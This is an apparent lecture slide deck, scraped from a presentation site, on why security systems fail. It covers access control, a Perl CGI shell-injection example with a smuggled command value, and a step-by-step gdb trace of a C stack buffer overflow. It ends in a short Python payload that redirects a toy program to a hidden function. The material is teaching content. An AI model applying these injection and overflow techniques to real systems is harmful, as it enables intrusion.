Why Security Systems Fail
This presentation is the property of its rightful owner.
Sponsored Links
1 / 24

Why Security Systems Fail PowerPoint PPT Presentation


  • 116 Views
  • Uploaded on
  • Presentation posted in: General

Why Security Systems Fail. Capability List. Access Control List. ALL STATES. UNSAFE / UNDEFINED STATES. SAFE STATES. #!/usr/bin/perl # funky CGI script example $dest = "foo1"; # pretend this is the destination address from the user

Download Presentation

Why Security Systems Fail

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


Why security systems fail

Why Security Systems Fail


Why security systems fail

Capability List


Why security systems fail

Access Control List


Why security systems fail

ALL STATES

UNSAFE / UNDEFINED STATES

SAFE STATES


Why security systems fail

#!/usr/bin/perl

# funky CGI script example

$dest = "foo1"; # pretend this is the destination address from the user

open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail

print MAIL "To: $dest\nFrom: me\n\nHi there!\n";

close MAIL;

!/usr/bin/perl

# funky CGI script example

$dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;";

open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail

print MAIL "To: $dest\nFrom: me\n\nHi there!\n";

close MAIL;


Why security systems fail

/usr/bin/perl –w

# (1) quit unless we have the correct number of command-line args

$num_args = $#ARGV + 1;

if ($num_args != 2) {

print "\nUsage: name.pl email-address brief-message\n";

exit;

}

# (2) we got two command line args, so assume it’s address

$dest=$ARGV[0];

$content=$ARGV[1];

my $sendmail = "/usr/sbin/sendmail -t";

#open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail

open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!";

print MAIL "To: $dest\n";

print MAIL "From: me\n";

print MAIL "Subject: test\n";

print MAIL "Content-type: text/plain\n\n";

print MAIL $content;

close MAIL;

Run it with

./tryit.pl ccpalmer “Some long message here inside quotes”

Could you find a way to trick the perl script into mailing you

some file that it shouldn’t???


Why security systems fail

“Never fly in a plane designed by an optimist.”


Why security systems fail

name[9]

degree[4]

0

0

0

0

0

0

0

0

0

0

0

0

0

0

strcpy(name,”charles”);

strcpy(degree,”PhD”);

0

‘c’

‘h’

‘a’

‘r’

‘l’

‘e’

‘s’

0

0

‘P’

‘h’

‘D’

0

printf(name);

charles

PhD

printf(degree);


Why security systems fail

name[9]

degree[4]

0

0

0

0

0

0

0

0

0

0

0

0

0

0

strcpy(name,”charleton”);

0

‘c’

‘h’

‘a’

‘r’

‘l’

‘e’

‘t’

‘o’

‘n’

0

0

0

0

strcpy(degree,”PhD”);

0

‘c’

‘h’

‘a’

‘r’

‘l’

‘e’

‘t’

‘o’

‘n’

‘P’

‘h’

‘D’

0

printf(name);

charletonPhD

PhD

printf(degree);


Why security systems fail

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

void secret1(void) {

puts("You found the secret function No. 1!\n");

}

int main () {

char string[2];

puts("Input: ");

scanf("%s", string);

printf("You entered %s.\n", string);

return 0;

}


Why security systems fail

At startup of poof

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000e52

rbp 0x7fff5fbff828

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Why security systems fail

Before call to puts()

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000e61

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Why security systems fail

Just inside of puts()

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000ea4

rbp 0x7fff5fbff810

rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Why security systems fail

Just after return from puts()

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4/* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000e66

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Why security systems fail

Just inside scanf( )

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4/* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000e66rsi 0x7fff5fbff800

rbp 0x7fff5fbff810

rsp 0x7fff5fbff7f8

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00

0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Why security systems fail

After return from scanf ( )

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4/* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000e7b

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Why security systems fail

Just before stack cleanup

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4/* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000e95

rbp 0x7fff5fbff810

rsp 0x7fff5fbff800

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00


Why security systems fail

And ready to return to the operating system?

0x0000000100000e52 <main+0>: push %rbp/* entry to main() */

0x0000000100000e53 <main+1>: mov %rsp,%rbp

0x0000000100000e56 <main+4>: sub $0x10,%rsp

0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi

0x0000000100000e61 <main+15>: callq 0x100000ea4/* puts () */

0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi

0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi

0x0000000100000e71 <main+31>: mov $0x0,%eax

0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */

0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi

0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi

0x0000000100000e86 <main+52>: mov $0x0,%eax

0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */

0x0000000100000e90 <main+62>: mov $0x0,%eax

0x0000000100000e95 <main+67>: leaveq

0x0000000100000e96 <main+68>: retq

rip 0x000100000e96

rbp 0x414141414141

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

?


Why security systems fail

Hello secret1( ) !!!

0x0000000100000e40 <secret1+0>: push %rbp

0x0000000100000e41 <secret1+1>: mov %rsp,%rbp

0x0000000100000e44 <secret1+4>: lea 0x65(%rip),%rdi # 0x100000eb0

0x0000000100000e4b <secret1+11>: callq 0x100000ea4 <dyld_stub_puts>

0x0000000100000e50 <secret1+16>: leaveq

0x0000000100000e51 <secret1+17>: retq

rip 0x000100000e40

rbp 0x414141414141

rsp 0x7fff5fbff818

0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00

0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

?


Why security systems fail

$ poof

Input:

A

You entered A.

$ cat poop

import struct

rip = 0x0000000100000e40

print("A"*24 + struct.pack("<q", rip))

$ python poop | poof

Input:

You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N.

You found the secret function No. 1!

Segmentation fault

$


And speaking of passwords

And speaking of passwords …

  • 4.7% of users have the password password;

  • 8.5% have the passwords password or 123456;

  • 9.8% have the passwords password, 123456 or 12345678;

  • 14% have a password from the top 10 passwords

  • 40% have a password from the top 100 passwords

  • 79% have a password from the top 500 passwords

  • 91% have a password from the top 1000 passwords

From https://xato.net/passwords/more-top-worst-passwords/#.VAh-1Esc8pw


  • Login